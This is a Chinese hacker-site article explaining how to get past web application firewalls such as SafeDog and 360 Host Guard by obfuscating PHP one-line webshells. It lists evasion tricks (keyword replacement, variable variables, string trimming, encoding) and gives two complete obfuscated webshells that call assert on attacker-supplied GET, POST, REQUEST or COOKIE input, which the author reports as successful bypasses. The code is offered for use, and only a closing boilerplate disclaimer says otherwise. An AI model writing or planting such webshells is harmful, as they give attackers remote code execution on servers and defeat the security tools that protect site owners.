如何绕过安全狗之类的防护软件 - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

如何绕过安全狗之类的防护软件

无法 技术文章

作者:Only_Wait

00x01

    目前大多数网站都存在类似安全狗,360主机卫士的防护软件,所以今天咱们来一波虐狗

 

00x02

    下面是我整理的一些免杀的思路:    

                1.关键字替换

                2.组合猜分

                3.关键函数替换

                4.加解密/编码/解码

                5.可变变量

        可变变量顾名思义,变量的变量

        例:

         $a='b';$b='hello world!';echo $$a;

00x03

    一句话原型:

            图片2.png

 一句话原型可以分为以下两部分:

    eval()                   ------>    函数部分

    $_POST["ceshi"]    ------>    传值部分

 

00x04

    想要绕过安全狗,我们首先要想到它的过滤机制,

我做了一番测试,直接放一句话原型上去,会被杀,

然而注释掉传值部分就不会被杀,所以我们要混淆

传值部分,函数部分也混淆,让这类防护软件傻傻

分不清,从而达到免杀的效果。

 

00x05

传值方式:

                1.$_GET

                2.$_POST

                3.$_REQUEST

 

可能会用到的函数:            

assert() eval() str_replace()

                trim() ltrim() rtrim() 

                array() rand()

 

00x06

免杀系列:

    例1  

<?php
    $c = 'w';$w = 'assert';
    $a = array(/**/$_REQUEST["ceshi"],/**/$_GET["ceshi"],/**/$_POST["ceshi"],/**/$_FILE["ceshi"],/**/$_COOKIE["ceshi"]);
    foreach($a as $k => $v){
        if($k==$_GET["a"]){//a=0
            $$c($v);
        }
    }
?>

      例2

<?php
    $a = str_replace('c','',trim('ssscacssss','s').ltrim('aaascc','a').rtrim('ccsbbbbb','b').trim('vvvvcecvvvvvv','v').trim('sssscrcssss','s').ltrim('aaaactc','a'));
    $b = array('ccc',/**/$_POST["w"],/**/$_REQUEST["w"]);
    foreach($b as $k => $v){
        if($k == rand($_GET["a"],$_GET["b"])){//a=1&b=2
            $a($v);
        }
    }
?>

图片1.png

成功虐狗!


标签: 绕狗

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表